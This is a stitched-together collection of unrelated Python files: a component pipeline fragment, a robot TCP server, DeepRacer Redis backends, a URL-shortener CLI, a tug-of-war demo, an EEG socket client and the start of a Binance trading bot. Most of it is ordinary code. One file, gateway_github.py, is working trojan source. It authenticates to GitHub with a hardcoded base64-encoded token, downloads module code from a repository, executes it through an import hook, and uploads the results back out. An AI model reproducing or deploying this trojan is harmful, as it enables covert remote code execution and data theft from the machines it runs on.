# If '$set' is set, we also publish all keys listed in there.
# In all other cases, we only send 'uid', 'type' and 'state'.
for thing in things:
if '$all' in thing:
del(thing['$all'])
if '$set' in thing:
del(thing['$set'])
to_publish.append(thing)
elif thing['state'] in rps.FINAL:
to_publish.append(thing)
else:
tmp = {'uid' : thing['uid'],
'type' : thing['type'],
'state' : thing['state']}
if '$set' in thing:
for key in thing['$set']:
tmp[key] = thing[key]
del(thing['$set'])
to_publish.append(tmp)
self.publish(rpc.STATE_PUBSUB, {'cmd': 'update', 'arg': to_publish})
# ts = time.time()
# for thing in things:
# self._prof.prof('publish', uid=thing['uid'],
# state=thing['state'], ts=ts)
# never carry $all and across component boundaries!
for thing in things:
if '$all' in thing:
del(thing['$all'])
# should we push things downstream, to the next component
if push:
# the push target depends on the state of things, so we need to sort
# the things into buckets by state before pushing them
# now we can push the buckets as bulks
for _state,_things in buckets.items():
# ts = time.time()
if _state in rps.FINAL:
# things in final state are dropped
for thing in _things:
self._log.debug('final %s [%s]', thing['uid'], _state)
self._prof.prof('drop', uid=thing['uid'], state=_state,
ts=ts)
continue
if _state not in self._outputs:
# unknown target state -- error
for thing in _things:
self._log.debug("lost %s [%s]", thing['uid'], _state)
self._prof.prof('lost', uid=thing['uid'], state=_state,
ts=ts)
continue
if not self._outputs[_state]:
# empty output -- drop thing
for thing in _things:
self._log.debug('drop %s [%s]', thing['uid'], _state)
self._prof.prof('drop', uid=thing['uid'], state=_state,
ts=ts)
continue
output = self._outputs[_state]
# push the thing down the drain
self._log.debug('put bulk %s: %s', _state, len(_things))
output.put(_things)
ts = time.time()
for thing in _things:
self._prof.prof('put', uid=thing['uid'], state=_state,
msg=output.name, ts=ts)
# --------------------------------------------------------------------------
#
def publish(self, pubsub, msg):
'''
push information into a publication channel
'''
if not self._publishers.get(pubsub):
raise RuntimeError("no msg route for '%s': %s" % (pubsub, msg))
self._publishers[pubsub].put(pubsub, msg)
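# A hedged sketch of the subclassing pattern described in the Component
# docstring above: register an input and an output in initialize(), then
# advance() things from the work method. The queue names and states below
# are placeholders, not real RP channel names, and the component would need
# matching bridge config files to actually run.
class _ExampleComponent(Component):
    def __init__(self, cfg, session):
        Component.__init__(self, cfg, session)
    def initialize(self):
        self.register_input('EXAMPLE_PENDING', 'example_in_queue', self.work)
        self.register_output('EXAMPLE_DONE', 'example_out_queue')
    def work(self, things):
        for thing in things:
            self._log.debug('working on %s', thing.get('uid'))
        # push the processed things to the registered output and publish state
        self.advance(things, 'EXAMPLE_DONE', publish=True, push=True)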
# ------------------------------------------------------------------------------
#
class Worker(Component):
'''
A Worker is a Component which cannot change the state of the thing it
handles. Workers are employed as helper classes to mediate between
components, between components and database, and between components and
notification channels.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
Component.__init__(self, cfg=cfg, session=session)
# ------------------------------------------------------------------------------
|
tcpSocket.py
|
#!/usr/bin/env python3
# Copyright 2019 Nina Marie Wahl and Charlotte Heggem.
# Copyright 2019 Norwegian University of Science and Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import os
import rclpy
import socket
def cl_black(msge): return '\033[30m' + msge + '\033[0m'
def cl_red(msge): return '\033[31m' + msge + '\033[0m'
def cl_green(msge): return '\033[32m' + msge + '\033[0m'
def cl_orange(msge): return '\033[33m' + msge + '\033[0m'
def cl_blue(msge): return '\033[34m' + msge + '\033[0m'
def cl_purple(msge): return '\033[35m' + msge + '\033[0m'
def cl_cyan(msge): return '\033[36m' + msge + '\033[0m'
def cl_lightgrey(msge): return '\033[37m' + msge + '\033[0m'
def cl_darkgrey(msge): return '\033[90m' + msge + '\033[0m'
def cl_lightred(msge): return '\033[91m' + msge + '\033[0m'
def cl_lightgreen(msge): return '\033[92m' + msge + '\033[0m'
def cl_yellow(msge): return '\033[93m' + msge + '\033[0m'
def cl_lightblue(msge): return '\033[94m' + msge + '\033[0m'
def cl_pink(msge): return '\033[95m' + msge + '\033[0m'
def cl_lightcyan(msge): return '\033[96m' + msge + '\033[0m'
class TCPSocket:
def __init__(self, ip, port,node):
self.BUFFER_SIZE = 4000
self.isconnected = False
self.node_name = node
self.ip = ip
self.port = port
self.tcp = None
#Data
self.odometry = []
self.laserScanB1 = []
self.laserScanB4 = []
self.kmp_statusdata = None
self.lbr_statusdata = None
self.lbr_sensordata = []
threading.Thread(target=self.connect_to_socket).start()
def close(self):
self.isconnected = False
def connect_to_socket(self):
print(cl_cyan('Starting up node:'), self.node_name, 'IP:', self.ip, 'Port:', self.port)
try:
self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address= (self.ip,self.port)
self.tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
self.tcp.bind(server_address)
except:
print(cl_red('Error: ') + "Connection for KUKA cannot assign requested address:", self.ip, self.port)
self.tcp.listen(3)
while (not self.isconnected):
try:
self.connection, client_address = self.tcp.accept()
self.tcp.settimeout(0.01)
self.isconnected = True
except:
t=0
time.sleep(1)
count = 0
while self.isconnected:
try:
last_read_time = time.time() # Keep received time
data = self.recvmsg()
for pack in (data.decode("utf-8")).split(">"): # parsing data pack
cmd_splt = pack.split()
if len(cmd_splt) and cmd_splt[0] == 'odometry':
self.odometry = cmd_splt
#print('odom')
if len(cmd_splt) and cmd_splt[0] == 'laserScan':
if cmd_splt[2] == '1801':
self.laserScanB1.append(cmd_splt)
#print(count)
count = count + 1
elif cmd_splt[2] == '1802':
self.laserScanB4.append(cmd_splt)
count = count + 1
if len(cmd_splt) and cmd_splt[0] == 'kmp_statusdata':
self.kmp_statusdata = cmd_splt
if len(cmd_splt) and cmd_splt[0] == 'lbr_statusdata':
self.lbr_statusdata = cmd_splt
if len(cmd_splt) and cmd_splt[0] == 'lbr_sensordata':
self.lbr_sensordata.append(cmd_splt)
except:
t = 0
print("SHUTTING DOWN")
self.connection.shutdown(socket.SHUT_RDWR)
self.connection.close()
self.tcp.close()
self.isconnected = False
print(cl_lightred('Connection is closed!'))
rclpy.shutdown()
def send(self, cmd):
try:
self.connection.sendall((cmd + '\r\n').encode("UTF-8"))
except:
print(cl_red('Error: ') + "sending message thread failed")
def recvmsg(self):
header_len = 10
msglength=0
byt_len = ""
byt_len = self.connection.recv(header_len)
diff_header = header_len - len(byt_len)
while (diff_header > 0):
byt_len += self.connection.recv(diff_header)
diff_header= header_len-len(byt_len)
msglength = int(byt_len.decode("utf-8")) + 1 #include crocodile and space
msg = b""
if(msglength>0 and msglength<5000):
msg = self.connection.recv(msglength)
diff_msg = msglength - len(msg)
while(diff_msg>0):
newmsg = self.connection.recv(diff_msg)
msg += newmsg
diff_msg = msglength - len(msg)
return msg
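# recvmsg() above expects a fixed 10-byte ASCII length header, then reads
# length + 1 bytes of payload (the extra byte covers the trailing '>'
# "crocodile"). A hedged sketch of a matching sender, purely to illustrate
# the framing; the exact padding used by the real KUKA side is an assumption:
def _example_send_framed(sock, pack):
    body = (pack + '>').encode("utf-8")
    header = str(len(body) - 1).rjust(10).encode("utf-8")  # 10-byte length field
    sock.sendall(header + body)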
|
deepracer_memory.py
|
from threading import Thread
import pickle
import time
import queue
import redis
import logging
from rl_coach.memories.backend.memory import MemoryBackend
from rl_coach.core_types import Episode
from markov.utils import Logger, json_format_logger, build_system_error_dict
from markov.utils import SIMAPP_MEMORY_BACKEND_EXCEPTION, SIMAPP_EVENT_ERROR_CODE_500
logger = Logger(__name__, logging.INFO).get_logger()
# Channel used by the training worker to request episodes
WORKER_CHANNEL = 'worker_channel'
# The amount of time to wait before querying the socket
POLL_TIME = 0.001
# Since all the data is handled by the physical memory, there is a limit to the number of steps that can
# be contained in a rollout. This number was determined empirically, as it seems rl_coach is making
# a bunch of hard copies of the transitions
MAX_MEMORY_STEPS = 10000
def log_info(message):
''' Helper method that logs the exception
message - Message to send to the log
'''
json_format_logger(message, **build_system_error_dict(SIMAPP_MEMORY_BACKEND_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500))
def get_endpoint_helper(redis_address, redis_port):
'''Helper method that returns a dict with the address and port
redis_address - address to be returned in the dict
redis_port - Port to be returned in the dict
'''
return {'redis_address': redis_address, 'redis_port': redis_port}
class DeepRacerRolloutBackEnd(MemoryBackend):
''' Class used by the rollout worker to publish data to the training worker'''
def __init__(self, params, num_consecutive_playing_steps):
''' params - Struct containing all the necessary redis parameters,
see RedisPubSubMemoryBackendParameters
num_consecutive_playing_steps - Struct containing the number of episodes to
collect before performing a training iteration
'''
# List of tuples containing the episode number and the episode data
self.data = list()
# The episode number of the last episode produced by the rollout worker
self.last_episode_num = 0
# The max number of episodes to collect before performing a training iteration
self.total_episodes = num_consecutive_playing_steps.num_steps
# Redis params
self.params = params
# Redis client that will allow us to publish and subscribe to messages
self.data_client = redis.Redis(self.params.redis_address, self.params.redis_port)
# Pubsub object that will allow us to subscribe to the data req channels this
# allow us to get request from the subscriber
self.data_pubsub = self.data_client.pubsub()
# Handle request via call back
self.data_pubsub.subscribe(**{WORKER_CHANNEL: self.data_req_handler})
self.data_pubsub.run_in_thread()
def data_req_handler(self, message):
''' Message handler for training worker request
message - Request from trainer worker containing the desired episode number
'''
episode = -1
try:
episode = pickle.loads(message['data'])
if episode < 0:
log_info("Negative episode index value")
return
if episode < len(self.data):
self.data_client.publish(self.params.channel, pickle.dumps(self.data[episode]))
# If the trainer requests the total episodes we know that the trainer has all the
# episodes so we will reset the data
if episode == self.total_episodes:
del self.data[:]
self.last_episode_num = 0
# Send an ACK letting the trainer know we have reset the data and it is safe
# to train
self.data_client.publish(self.params.channel,
pickle.dumps((self.total_episodes + 1, "")))
except redis.ConnectionError as ex:
logger.info("Redis connection error: {}".format(ex))
except pickle.PickleError as ex:
logger.info("Could not decode/encode trainer request {}".format(ex))
except Exception as ex:
logger.info("Rollout worker data_req_handler {}".format(ex))
def store(self, obj):
''' Stores the data object into the data list along with episode number
obj - Data object to be stored in the data list
'''
self.data.append((self.last_episode_num, obj))
self.last_episode_num += 1
def get_endpoint(self):
'''Returns a dict with the redis address and port '''
return get_endpoint_helper(self.params.redis_address, self.params.redis_port)
class DeepRacerTrainerBackEnd(MemoryBackend):
'''Class used by the training worker to retrieve the data from the rollout worker '''
def __init__(self, params):
''' params - Struct containing all the necessary redis parameters,
see RedisPubSubMemoryBackendParameters
'''
# Redis params
self.params = params
# Track the total steps taken in the rollout
self.rollout_steps = 0
# Episode number whose data is to be retrieved from the rollout worker
self.episode_req = 0
# Episodes in rollout
self.total_episodes_in_rollout = 0
# Queue object to hold data from the rollout worker while waiting to be consumed
self.data_queue = queue.Queue(1)
# Flag to notify the publish worker that data should be requested
self.request_data = False
# Redis client that will allow us to publish and subscribe to messages
self.data_client = redis.Redis(self.params.redis_address, self.params.redis_port)
# Pubsub object that will allow us to subscribe to the data channel and request data
self.data_pubsub = self.data_client.pubsub()
# Handle data returning from the rollout worker via callback
self.data_pubsub.subscribe(**{self.params.channel: self.data_handler})
self.data_pubsub.run_in_thread()
# Use a separate thread to request data
Thread(target=self.publish_worker).start()
def data_handler(self, message):
''' Message handler for data sent from the rollout worker
message - Tuple sent from the rollout worker containing episode number and data
'''
try:
obj = pickle.loads(message['data'])
if isinstance(obj, tuple):
self.data_queue.put_nowait(obj)
except queue.Full:
pass
except Exception as ex:
log_info("Trainer data handler error: {}".format(ex))
def get_rollout_steps(self):
'''Returns the total number of steps in a rollout '''
return self.rollout_steps
def get_total_episodes_in_rollout(self):
'''Return the total number of episodes collected in the rollout '''
return self.total_episodes_in_rollout
def publish_worker(self):
''' Worker responsible for requesting data from the rollout worker'''
while True:
try:
if self.request_data:
# Request the desired episode
self.data_client.publish(WORKER_CHANNEL, pickle.dumps(self.episode_req))
time.sleep(10*POLL_TIME)
except redis.ConnectionError as ex:
log_info("Redis connection error: {}".format(ex))
continue
except pickle.PickleError as ex:
log_info("Could not decode rollout request {}".format(ex))
continue
except Exception as ex:
log_info("Trainer publish worker error: {}".format(ex))
continue
def fetch(self, num_consecutive_playing_steps=None):
''' Retrieves the data from the rollout worker
num_consecutive_playing_steps - Struct containing the number of episodes to
collect before performing a training iteration
'''
episode_counter = 0
step_counter = 0
self.request_data = True
self.rollout_steps = 0
self.total_episodes_in_rollout = 0
while episode_counter <= num_consecutive_playing_steps.num_steps:
try:
obj = self.data_queue.get()
if obj[0] == episode_counter and isinstance(obj[1], Episode):
episode_counter += 1
step_counter += obj[1].length()
self.episode_req = episode_counter
if step_counter <= MAX_MEMORY_STEPS:
self.rollout_steps += obj[1].length()
self.total_episodes_in_rollout += 1
yield from obj[1]
# When we request num_consecutive_playing_steps.num_steps we will get back
# 1 more than the requested index; this lets us know the rollout worker
# has given us all available data
elif obj[0] == num_consecutive_playing_steps.num_steps + 1:
episode_counter = obj[0]
self.episode_req = 0
self.request_data = False
except Exception as ex:
log_info("Trainer fetch error: {}".format(ex))
continue
def get_endpoint(self):
'''Returns a dict with the redis address and port '''
return get_endpoint_helper(self.params.redis_address, self.params.redis_port)
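# --- Illustrative sketch (not part of the original backend) ---
# The two backends above exchange data over Redis pub/sub: the trainer publishes
# the index of the episode it wants, and the rollout worker replies with a
# pickled (episode_number, payload) tuple on a separate channel. A minimal,
# hedged version of that handshake is sketched below; the channel names and the
# localhost Redis endpoint are assumptions for illustration only.
import pickle
import redis

REQUEST_CHANNEL_DEMO = "episode_requests"
DATA_CHANNEL_DEMO = "episode_data"

def demo_rollout_side(client, collected_episodes):
    """Answer each request with the pickled (episode, payload) tuple, if collected."""
    pubsub = client.pubsub(ignore_subscribe_messages=True)
    pubsub.subscribe(REQUEST_CHANNEL_DEMO)
    for message in pubsub.listen():
        episode = pickle.loads(message["data"])
        if episode in collected_episodes:
            client.publish(DATA_CHANNEL_DEMO,
                           pickle.dumps((episode, collected_episodes[episode])))

def demo_trainer_side(client, episode):
    """Request one episode and block until the matching reply arrives."""
    pubsub = client.pubsub(ignore_subscribe_messages=True)
    pubsub.subscribe(DATA_CHANNEL_DEMO)  # subscribe first so the reply is not missed
    client.publish(REQUEST_CHANNEL_DEMO, pickle.dumps(episode))
    for message in pubsub.listen():
        got_episode, payload = pickle.loads(message["data"])
        if got_episode == episode:
            return payload

# Usage (assuming a local Redis server):
#   client = redis.Redis("localhost", 6379)
#   run demo_rollout_side in one process and demo_trainer_side in another.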
|
cuthes.py
|
#!/usr/bin/env python3
import json
import os
import itertools
import time
import csv
import threading
import argparse
try:
from bs4 import BeautifulSoup
import requests
import requests_futures
import lxml
except ModuleNotFoundError:
os.system('pip3 install bs4')
os.system('pip3 install requests')
os.system('pip3 install requests-futures')
os.system('pip3 install lxml')
# Re-import now that the packages are installed, so the names are actually bound.
from bs4 import BeautifulSoup
import requests
import requests_futures
import lxml
from resources.sites import Shorten, request
from notify import update
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
# First of all, check for updates
update()
# Get the project version by reading the .version file
def get_version():
with open('.version', 'r') as file:
version = 'cuthes: ' + file.read()
return version
def get_arguments():
"""
Parses the main command-line arguments
using argparse
"""
parser = argparse.ArgumentParser()
parser.add_argument(dest="url", nargs="+", metavar="LINK", action="store", help="This is the link you want to shorten.")
parser.add_argument("--save", "-s", dest="save", help="If you use this command, you can save the results according to the file type.")
parser.add_argument('--version', '-v', action='version', version=get_version(), help="It's me showing the version of the project or script.")
parser.add_argument('--tor', '-t', dest='tor', action='store_true', help='Connecting with Tor to make requests from Tor.')
parser.add_argument('--proxy', '-p', dest='proxy', action="store", default=None, help='Make requests through proxy link. socks5://127.0.0.1:1080')
parser.add_argument('--browser', '-b', dest="browser", action="store", default=None, help='It changes the browser for requests. You can choose several browsers. (chrome or firefox or another)')
parser.add_argument('--colorless', dest='no_color', action='store_true', help='Disables colors terminal output.')
options = parser.parse_args()
return options
def loader():
global Done
Done = False
print("\033[s", end="")
for c in itertools.cycle(["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]):
if Done:
break
print("\033[u", end="")
print(f"{darkgreen + '[' + reset + c + darkgreen + ']'} {darkgreen + 'Checking The URL...' + reset}")
time.sleep(0.1)
def color(args):
global red
global darkred
global underline
global green
global darkgreen
global reset
global white
global darkwhite
if args.no_color:
# Disable color output.
red = "\033[0;0m"
darkred = "\033[0;0m"
underline = "\033[0;0m"
green = "\033[0;0m"
darkgreen = "\033[0;0m"
reset = "\033[0;0m"
white = "\033[0;0m"
darkwhite = "\033[0;0m"
else:
# Enable color output.
red = "\033[0;31m"
darkred = "\033[1;31m"
underline = "\033[4m"
green = "\033[0;32m"
darkgreen = "\033[1;32m"
reset = "\033[0;0m"
white = "\033[0;37m"
darkwhite = "\033[1;37m"
def sites(args=None):
# Query every supported shortener service for the given URL
if args.url:
global allsite
global Done
allsite = []
url = args.url
shorten = Shorten(url)
time.sleep(1)
t = threading.Thread(target=loader)
t.start()
allsite.append(shorten.adfly())
allsite.append(shorten.binbuck())
allsite.append(shorten.bitly())
allsite.append(shorten.chilp())
allsite.append(shorten.cleanuri())
allsite.append(shorten.cpmlink())
allsite.append(shorten.cuttus())
allsite.append(shorten.cuttly())
allsite.append(shorten.gcc())
allsite.append(shorten.gg())
allsite.append(shorten.intip())
allsite.append(shorten.isgd())
allsite.append(shorten.linkfox())
allsite.append(shorten.linkmngr())
allsite.append(shorten.linkshortner())
allsite.append(shorten.n9())
allsite.append(shorten.osdb())
allsite.append(shorten.ouoio())
allsite.append(shorten.shortam())
allsite.append(shorten.shortest())
allsite.append(shorten.shortmy())
allsite.append(shorten.shorturl())
allsite.append(shorten.snip())
allsite.append(shorten.tinyurl())
allsite.append(shorten.trimurl())
allsite.append(shorten.u())
allsite.append(shorten.urlz())
allsite.append(shorten.vgd())
allsite.append(shorten.vht())
allsite.append(shorten.vu())
allsite.append(shorten.youtube())
allsite.append(shorten.zzb())
Done = True
for sites in allsite:
parser = json.loads(sites)
name = parser['name']
url = parser['url']
status = parser['status']
if status == 'true':
print(f'[{darkgreen + "+" + reset}] ' + darkgreen + name + ': ' + reset + url)
if status == 'false':
print(f'[{darkred + "-" + reset}] ' + darkgreen + name + ': ' + reset + url)
def contextTypes(file, status, site, url, path):
# This function picks the output format from the file extension so the results are saved correctly
filename = os.path.basename(file)
dot = os.path.splitext(filename)[1].lstrip('.')
if dot == "csv":
writer = csv.writer(path)
if status == 'true':
writer.writerow([site, url])
if status == 'false':
pass
else:
if status == 'true':
path.write(url + '\n')
if status == 'false':
path.write('')
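# --- Illustrative sketch (not part of the original script) ---
# contextTypes() above dispatches on the output file's extension: ".csv" results
# go through csv.writer, anything else is written as plain lines. A minimal,
# self-contained version of that dispatch; the file name and results below are
# made up for illustration (it relies on the os and csv imports at the top of
# this file).
def _demo_save(results, out_path="demo_links.csv"):
    ext = os.path.splitext(out_path)[1].lower()
    with open(out_path, "w", newline="", encoding="utf-8") as handle:
        if ext == ".csv":
            writer = csv.writer(handle)
            for name, url in results:
                writer.writerow([name, url])
        else:
            for _name, url in results:
                handle.write(url + "\n")
# Example: _demo_save([("TinyURL", "https://tinyurl.com/abc"), ("is.gd", "https://is.gd/xyz")])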
def output(args):
# Here if the user wants to save to a file
if args.save:
os.makedirs(os.path.dirname(args.save), exist_ok=True)
with open(args.save, "w", newline='', encoding="utf-8") as file:
for sites in allsite:
parser = json.loads(sites)
site = parser['name']
status = parser['status']
url = parser['url']
contextTypes(args.save, status, site, url, file)
def result(args):
request(args)
color(args)
sites(args)
output(args)
def run():
# Entry point: parse the arguments and run
args = get_arguments()
args = result(args)
if args is None:
return
if __name__ == '__main__':
run()
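# --- Illustrative usage (assumed invocations, not part of the original script) ---
# Based on the options defined in get_arguments():
#   python3 cuthes.py https://example.com
#   python3 cuthes.py https://example.com --save results/links.csv
#   python3 cuthes.py https://example.com --tor --colorless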
|
main.py
|
from time import sleep
#from subprocess import call
from multiprocessing.managers import ValueProxy
from multiprocessing.synchronize import Event as EventHint
from multiprocessing import Process, Event, Manager
try: # Change process names to something informational when setproctitle is installed.
from setproctitle import setproctitle
except ImportError: # setproctitle isn't installed, processes will use their default names.
setproctitle = None
WIN_NUMBER = 200
SLEEPTIME = 0.05
score = [0, 0]
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def tug(tug_progress: ValueProxy, change: int, done_flag: EventHint = None, name: str = None):
try:
if setproctitle is not None and name:
setproctitle(name)
while not done_flag.is_set():
tug_progress.set(tug_progress.get() + change)
sleep(SLEEPTIME)
except KeyboardInterrupt:
print(f"Stopped: '{name}'") # Suppress KeyboardInterrupt traceback.
def main():
progress = Manager().Value('i', WIN_NUMBER // 2)
done_flag = Event()
tug_right = Process(target=tug, args=(progress, 1, done_flag, "Python | tug right"))
tug_left = Process(target=tug, args=(progress, -1, done_flag, "Python | tug left"))
tug_right.start()
tug_left.start()
if setproctitle is not None:
setproctitle("python | tug print")
while (current_progress := progress.get()) in range(WIN_NUMBER + 1):
print(f"{bcolors.FAIL}({score[0]})\t"
f"{'=' * current_progress}"
f"{bcolors.OKBLUE}{max(score) - min(score)}" # 0
f"{bcolors.OKGREEN}{'=' * (WIN_NUMBER - current_progress)}"
f"\t({score[1]})")
sleep(SLEEPTIME)
#call(['clear']) # Clears the console on UNIX systems; duh!
print(bcolors.BOLD)
if current_progress >= WIN_NUMBER:
print(bcolors.OKGREEN + "Right side won!")
score[1] += 1
else:
print(bcolors.FAIL + "Left side won!")
score[0] += 1
done_flag.set()
tug_right.join(timeout=SLEEPTIME * 10)
tug_left.join(timeout=SLEEPTIME * 10)
tug_right.terminate()
tug_left.terminate()
if __name__ == '__main__':
# main()
# raise SystemExit()
try:
while True:
main()
sleep(3)
except KeyboardInterrupt:
pass # Suppress the traceback.
|
gateway_github.py
|
#!/usr/bin/python
import json
import base64
import sys
import time
import imp
import random
import threading
import queue
import os
from github3 import login
trojan_id = "cfg"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
task_queue = queue.Queue()
configured = False
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self, fullname, path=None):
if configured:
print("[*] Attempting to retrieve % s" % fullname)
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec(self.current_module_code, module.__dict__)
sys.modules[name] = module
return module
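# --- Illustrative sketch (not part of the original script) ---
# GitImporter above implements the legacy find_module/load_module hooks so that,
# once registered on sys.meta_path further down in this script, "import some_module"
# is satisfied by code pulled from GitHub. The same idea with the modern importlib
# API, serving a module from an in-memory dict instead of a remote repository
# (the module name and source below are made up):
import importlib.abc
import importlib.util

_IN_MEMORY_SOURCES = {"hello_demo": "GREETING = 'hi from an in-memory module'"}

class InMemoryFinder(importlib.abc.MetaPathFinder, importlib.abc.Loader):
    def find_spec(self, fullname, path=None, target=None):
        if fullname in _IN_MEMORY_SOURCES:
            return importlib.util.spec_from_loader(fullname, self)
        return None  # let the regular finders handle everything else

    def create_module(self, spec):
        return None  # use the default module creation

    def exec_module(self, module):
        # Run the stored source inside the new module's namespace.
        exec(_IN_MEMORY_SOURCES[module.__name__], module.__dict__)

# Usage:
#   sys.meta_path.insert(0, InMemoryFinder())
#   import hello_demo
#   print(hello_demo.GREETING)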
def connect_to_github():
tmp_token = "NWQ0MzMwZmI0ZWE4ZmYwZTk4ZjU4YzkxOTk3OTlkYTk2ZDAyYmI5ZQ=="
#print("decode token is % s" % base64.b64decode(tmp_token))
gh = login(username="", password="",
token=base64.b64decode(tmp_token).decode())
repo = gh.repository("Max88888", "python_bhp")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
print("branch link : ", branch.links)
tree = branch.commit.commit.tree.refresh().recurse()
for filename in tree.tree:
if filepath in filename.path:
print("[*] Found file %s" % filepath)
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh, repo, branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
repo.create_file(remote_path, "Commit message",
base64.b64encode(data.encode()))
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store the result in our repo
store_module_result(result)
return
# main trojan loop
sys.meta_path = [GitImporter()]
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random.randint(1, 10))
time.sleep(random.randint(10, 20))
|
DataClient.py
|
import socket
import struct
import threading
import numpy as np
from Online.AmpInterface import AmpDataClient
class Neuracle(AmpDataClient):
UPDATE_INTERVAL = 0.04
BYTES_PER_NUM = 4
BUFFER_LEN = 4  # in seconds
def __init__(self, n_channel=9, samplerate=1000, host='localhost', port=8712):
self.n_channel = n_channel
self.chunk_size = int(self.UPDATE_INTERVAL * samplerate * self.BYTES_PER_NUM * n_channel)
self.__sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.buffer = []
self.max_buffer_length = int(self.BUFFER_LEN / self.UPDATE_INTERVAL)
self._host = host
self._port = port
# thread lock
self.lock = threading.Lock()
self.__datathread = threading.Thread(target=self.__recv_loop)
# start client
self.config()
def config(self):
self.__sock.connect((self._host, self._port))
self.__run_forever()
def is_active(self):
return self.__sock.fileno() != -1
def close(self):
self.__sock.close()
self.__datathread.join()
def __recv_loop(self):
while self.__sock.fileno() != -1:
try:
data = self.__sock.recv(self.chunk_size)
except OSError:
break
if len(data) % 4 != 0:
continue
self.lock.acquire()
self.buffer.append(data)
# remove old data
if len(self.buffer) == self.max_buffer_length:
del self.buffer[0]
self.lock.release()
def __run_forever(self):
self.__datathread.start()
def get_trial_data(self):
"""
called to copy trial data from buffer
:return:
timestamps: list of timestamp
data: ndarray with shape of (channels, timesteps)
"""
self.lock.acquire()
raw_data = self.buffer.copy()
self.buffer.clear()
self.lock.release()
total_data = b''.join(raw_data)
byte_data = bytearray(total_data)
if len(byte_data) % 4 != 0:
raise ValueError
data = np.frombuffer(byte_data, dtype='<f')
data = np.reshape(data, (-1, self.n_channel))
timestamps = np.nonzero(data[:, -1])[0].tolist()
return timestamps, data[:, :-1].T
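# --- Illustrative sketch (not part of the original client) ---
# get_trial_data() above decodes the socket stream as little-endian float32
# samples laid out sample-major: every n_channel consecutive floats form one
# time step, and the last channel carries the trigger/timestamp track. A
# minimal decoding example on synthetic data (all values are made up):
_demo_n_channel = 3                               # 2 signal channels + 1 trigger channel
_demo_samples = np.array([[0.1, 0.2, 0.0],        # time step 0, no trigger
                          [0.3, 0.4, 1.0]],       # time step 1, trigger fired
                         dtype='<f4')
_demo_raw = _demo_samples.tobytes()               # what the socket would deliver
_demo_data = np.frombuffer(_demo_raw, dtype='<f').reshape(-1, _demo_n_channel)
assert np.nonzero(_demo_data[:, -1])[0].tolist() == [1]   # trigger at time step 1
assert _demo_data[:, :-1].T.shape == (2, 2)               # (channels, timesteps)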
|
fastTradeV2.py
|
import logging
import asyncio
from binance.client import Client
from binance_f import RequestClient
from binance_f import SubscriptionClient
from binance_f.constant.test import *
from binance_f.model import *
from binance_f.exception.binanceapiexception import BinanceApiException
from binance_f.base.printobject import *
import time
import threading
import talib as ta
import numpy as np
from datetime import datetime
import curses
import json
import os
from os import path
from talipp.ohlcv import OHLCVFactory
import talipp.indicators as talippIndicator
import random
def dict2obj(d):
'''
https://stackoverflow.com/questions/1305532/convert-nested-python-dict-to-object
'''
if isinstance(d, list):
d = [dict2obj(x) for x in d]
if not isinstance(d, dict):
return d
class C(object):
pass
o = C()
for k in d:
o.__dict__[k] = dict2obj(d[k])
return o
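# --- Illustrative usage (not part of the original module) ---
# dict2obj() turns nested dicts/lists into attribute access; a tiny example with
# made-up order data:
_demo_order = dict2obj({"status": "FILLED", "fills": [{"price": 345.2, "qty": 0.5}]})
assert _demo_order.status == "FILLED"
assert _demo_order.fills[0].price == 345.2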
def utc_2_datetime(timestamp):
return '{}({})'.format(datetime.fromtimestamp(int(timestamp)), (str(time.tzname[-1])))
def calculate_ema(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# ema1 = ta.EMA(np_price_list, indicator_config['ema']['ema1'])
# ema2 = ta.EMA(np_price_list, indicator_config['ema']['ema2'])
# ema3 = ta.EMA(np_price_list, indicator_config['ema']['ema3'])
'''
ema_task_1 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema1']))
ema_task_2 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema2']))
ema_task_3 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema3']))
ema_task_1.start()
ema_task_2.start()
ema_task_3.start()
ema_task_1.join()
ema_task_2.join()
ema_task_3.join()
ema1 = ema_task_1.get_result()
ema2 = ema_task_2.get_result()
ema3 = ema_task_3.get_result()
return np.array([ema1, ema2, ema3])
def calculate_macd(np_price_list, indicator_config):
macd, macdsignal, macdhist = ta.MACD(np_price_list,
fastperiod=indicator_config['macd']['fastperiod'],
slowperiod=indicator_config['macd']['slowperiod'],
signalperiod=indicator_config['macd']['signalperiod'])
